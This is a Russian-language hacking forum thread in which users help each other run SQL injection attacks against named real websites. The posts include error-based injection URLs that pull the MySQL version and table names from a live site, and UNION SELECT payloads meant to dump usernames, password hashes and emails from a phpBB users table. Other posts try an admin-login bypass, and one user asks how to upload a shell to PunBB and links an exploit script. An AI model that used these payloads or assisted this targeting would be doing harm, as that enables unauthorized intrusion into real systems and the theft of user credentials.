Набираю в админке: 'or+5=5)-- выскакивает такая ошибка: error executing query select id from trustee where name = ''or+5=5)-- ': You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')-- '' at line 1 Как тут правильно составить запрос? Заранее всем спасибо!
Code: http://www.vierpfoten.org/website/output.php?id=1001%27+and+%28select*from%28select+count%28*%29from%28select+1+union+select+2+union+select+3%29x+group+by%20concat%28mid%28%28select+version%28%29+from+INFORMATION_SCHEMA.TABLES+limit+0,1%29,1,33%29,floor%28rand%280%29*2%29%29%29z%29/* Version: 5.0.22-Debian_0ubuntu database: cmsVpOrgNe ищи я уверен ты найдешь там что нужно Code: http://www.vierpfoten.org/website/output.php?id=1001%27+and+%28select*from%28select+count%28*%29from%28select+1+union+select+2+union+select+3%29x+group+by%20concat%28mid%28%28select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+0,1%29,1,10%29,floor%28rand%280%29*2%29%29%29z%29/*
ребят помогите са скулом есть таблица phpbb_users table_rows возвращает 4186 а когда делаю запрос union+select+1,2+from+phpbb_users-- выдает ошибку help!!
Ты пытаешься вывести колонки 1 и 2 , которые не существуют в таблице phpbb_users Почитай внимательнее
union+select+concat(username,char(58),user_password,char(58),user_email,char(58),user_icq),2+from+phpbb_users-- тоже возвращает ошибку
Konqi телепатов нет - какую ошибку выдает? Мейби с кодировкой что то не то и нужно например unhex(hex(, e.g.: union+select+unhex(hex(concat_ws(0x3a,username,user_password ,user_email,user_icq))),2+from+ph pbb_users--
+union+select+1,2+from+information_schema.tables NORM +union+select+1,2+from+phpbb_users ERROR но знаю что таблица существует table_rows возвращает 4186 ,значит таблица не пуста
Возможно что: 1)Проблемы с кодировкой, как можно решить описал. 2)Не достаточно грантов на phpbb_users. 3)phpbb_users нет. 4)Какая то хитрая гверя или скрипт выполняющий запрос что то меняет(мало вероятно). 5)ХЗ.
Konqi Когда Вы научитесь читать что-то? Даю 99% что таблица в другой базе, этот вопрос сдесь задавали раз 500 В мускуле нельзя разграничить права на таблицы, только базы
есть способы заливки шелла в PunBB 1.2.15 с правами админа ? пробывал сплоент http://www.security.nnov.ru/files/punBB_spl.pl, не работает
http://www.nzp.co.nz/company.php?pg=79/**/order/**/by/**/4/* помогите раскрутить скуль Как я понял выводится только через ошибку